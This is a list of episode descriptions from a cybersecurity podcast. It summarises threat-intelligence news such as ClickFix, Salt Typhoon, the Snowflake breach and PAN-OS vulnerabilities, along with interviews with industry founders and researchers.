The Cybersecurity Defenders Podcast

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.In recent months, cybersecurity researchers have observed a surge in the use of a social engineering technique known as "ClickFix." This method involves threat actors presenting users with deceptive error messages that prompt them to manually execute malicious commands, often by copying and pasting scripts into their systems.Raspberry Robin, also known as Roshtyak, is a highly obfuscated malware first discovered in 2021, notable for its complex binary structure and advanced evasion techniques. It primarily spreads via infected USB devices and employs multi-layered execution to obscure its true purpose. A China-linked Advanced Persistent Threat (APT) group, Gelsemium, has been observed targeting Linux systems for the first time, deploying previously undocumented malware in an espionage campaign. Historically known for targeting Windows platforms, this new activity signifies a shift towards Linux, possibly driven by the increasing security of Windows systems.Russia’s APT28 hacking group, also known as Fancy Bear or Unit 26165, has developed a novel technique dubbed the “nearest neighbor attack” to exploit Wi-Fi networks remotely.Hackers linked to the Chinese government, known as Salt Typhoon, have deeply infiltrated U.S. telecommunications infrastructure, gaining the ability to intercept unencrypted phone calls and text messages. The group exploited vulnerabilities in the wiretap systems used by U.S. authorities for lawful interception, marking what Senator Mark Warner has called "the worst telecom hack in our nation's history."

On today's episode of The Cybersecurity Defenders Podcast we talk about cybercrime cottage industries with Reed McGinley-Stempel, the Co-Founder and CEO of StytchStytch is a platform designed to streamline authentication, authorization, and fraud prevention in a way that enhances security while minimizing user friction. Stytch serves both consumer and B2B applications, offering a variety of authentication solutions, including features like Google One-Tap and Biometrics for consumer-facing applications, as well as SSO, Role-Based Access Control, and SCIM integrations for enterprise SaaS. Reed founded Stytch after witnessing the challenges teams face when building secure and user-friendly authentication solutions, a problem he first encountered while working at Plaid. He is also a proud duke alumni and was the recipient of the prestigious Fullbright Scholarship

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.U.S. authorities have identified and charged individuals responsible for a significant data breach involving Snowflake Inc., a major cloud data warehousing company. The breach resulted in the theft of approximately 50 billion records from AT&T, one of Snowflake's prominent clients.U.S. prosecutors have charged five individuals, including 22-year-old Scottish national Tyler Buchanan, for their alleged involvement in the cybercrime group Scattered Spider. This group is accused of executing sophisticated phishing attacks that compromised numerous U.S. companies and individuals, leading to the theft of confidential information and cryptocurrency. The next one is an interesting breakdown on the evolving landscape of Chinese state-sponsored cyber threats that reveals a highly coordinated and multi-layered approach to achieving the strategic objectives of the Chinese Communist Party (CCP).In July 2024, cybersecurity researchers identified a new variant of the Melofee backdoor, a sophisticated malware associated with the Winnti Advanced Persistent Threat group. This variant specifically targets Red Hat Enterprise Linux 7.9 systems and demonstrates enhanced stealth and persistence mechanisms. In early October 2024, cybersecurity analysts identified a phishing campaign targeting e-commerce shoppers in Europe and the USA seeking Black Friday discounts. The campaign, attributed to a financially motivated Chinese threat actor dubbed "SilkSpecter," exploited the surge in online shopping during November's Black Friday season. Palo Alto Networks' Unit 42 has identified exploitation activities targeting two critical vulnerabilities in PAN-OS software: CVE-2024-0012 and CVE-2024-9474.

On this episode of The Cybersecurity Defenders Podcast we speak with Jibby Saetang, Security Researcher with Microsoft GHOST, about his novel path to a career in cybersecurity.With over a decade of experience in watch and jewelry repair, Jibby developed an impressive eye for detail and a knack for solving complex problems. These skills translated seamlessly into the world of cybersecurity, where Jibby found an unexpected yet perfect fit. Driven by a passion for learning, Jibby dove into the KC7 platform, an immersive cybersecurity training resource, which ultimately led to a role at Microsoft—all without taking the traditional certification route. Jibby’s story is a testament to the power of persistence, passion, and non-traditional paths in tech. Now, Jibby is focused on helping others break into cybersecurity by developing new KC7 training modules, aiming to inspire and equip the next generation of problem-solvers.

Matt Bromley, a cybersecurity expert, dives into the latest threats and tools shaping the landscape. He explains how the MFA Sweep PowerShell script could enhance security by checking for multi-factor authentication. The CVE2CAPEC tool helps map vulnerabilities, aiding researchers in defending against attacks. Bromley discusses the unsettling trend of North Korean IT workers infiltrating Western companies and highlights targeted malware campaigns, like GootLoader targeting Bengal cat lovers, stressing the urgency for user education and collaboration in cybersecurity.

Matt Bromley, a cybersecurity expert, dives into the latest threats and vulnerabilities. He discusses the evolution of Latrodectus malware, noting its sophisticated evasion techniques. The conversation highlights a critical zero-day vulnerability in FortiManager, underlining urgent security implications. Bromley also examines the EU's updated product liability framework, aiming to better protect consumers in the digital age. Lastly, he touches upon the controversial expulsion of Russian maintainers from Linux, raising questions about geopolitics and open source governance.

On this episode of The Cybersecurity Defenders Podcast we talk about running and MDR company with Joshua Sitta, Co-Founder and CTO at Sittadel.My guest today is Joshua Sitta, the co-founder and CTO of Sittadel, a cybersecurity company specializing in 24/7/365 Managed Detection and Response services. With a focus on enterprise-grade EDR solutions, Sittadel provides comprehensive cybersecurity monitoring and incident response. Before founding Sittadel, Joshua served as the Director of Enterprise Security Architecture at SouthState Bank, where he built a robust in-house cybersecurity program that safeguarded billions in assets. He brings a deep expertise in protecting organizations from modern cyber threats.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Microsoft has recently confirmed that a software bug caused the loss of more than two weeks' worth of critical security logs from several of its cloud services.Brazil’s Federal Police have arrested a hacker suspected to be "USDoD," a notorious cybercriminal involved in several high-profile data breaches.A critical vulnerability has been discovered in SolarWinds' Web Help Desk (WHD) software, involving hardcoded credentials that could be exploited by attackers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added several critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, signaling that these flaws are being actively used in cyberattacks.

On this episode of The Cybersecurity Defenders Podcast we examine how AI is revolutionizing compliance with Dr. Gaurav Banga, CEO of Balbix.Gaurav Banga, the CEO and Founder of Balbix, an AI-powered cybersecurity risk management startup. Gaurav is an accomplished inventor with over 50 patents to his name, and he has a deep background in founding and leading multiple successful tech ventures. His journey into entrepreneurship is unique—it began over a decade ago when he was inspired by a book that eventually led him to leave academia and pursue his passion for deep tech.Gaurav regularly speaks with CISOs, gaining firsthand insights into their biggest challenges as they navigate an increasingly complex cybersecurity landscape. As regulatory scrutiny around security disclosures intensifies, Gaurav offers a unique perspective on how AI can reshape the future of risk management, helping organizations strike the right balance between innovation and security.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.A recent malware campaign has been discovered that exploits the open-source Wazuh SIEM agent to deliver a cryptomining payload. There is uncertainty surrounding the .io domain following the UK’s decision to return the Chagos Islands, including the British Indian Ocean Territory, to Mauritius.The October 2024 report, "Influence and Cyber Operations," explores how AI is being leveraged by both state and non-state actors in cyber campaigns. Key findings show that AI tools are increasingly being used to enhance traditional cyberattacks, particularly in areas like vulnerability research, malware debugging, and influence operations. Discord has recently been blocked in both Russia and Turkey due to claims of illegal activity on the platform.Palo Alto Networks recently patched several critical vulnerabilities in its Expedition tool, which could allow attackers to take control of firewall systems. The most severe flaw, CVE-2024-9463, allows unauthenticated attackers to execute arbitrary OS commands as root, exposing sensitive data like usernames, passwords, and API keys.The article from ESET highlights a cyberespionage campaign conducted by a group known as GoldenJackal, which is targeting government and diplomatic entities, focusing specifically on air-gapped systems in regions such as Europe, the Middle East, and South Asia.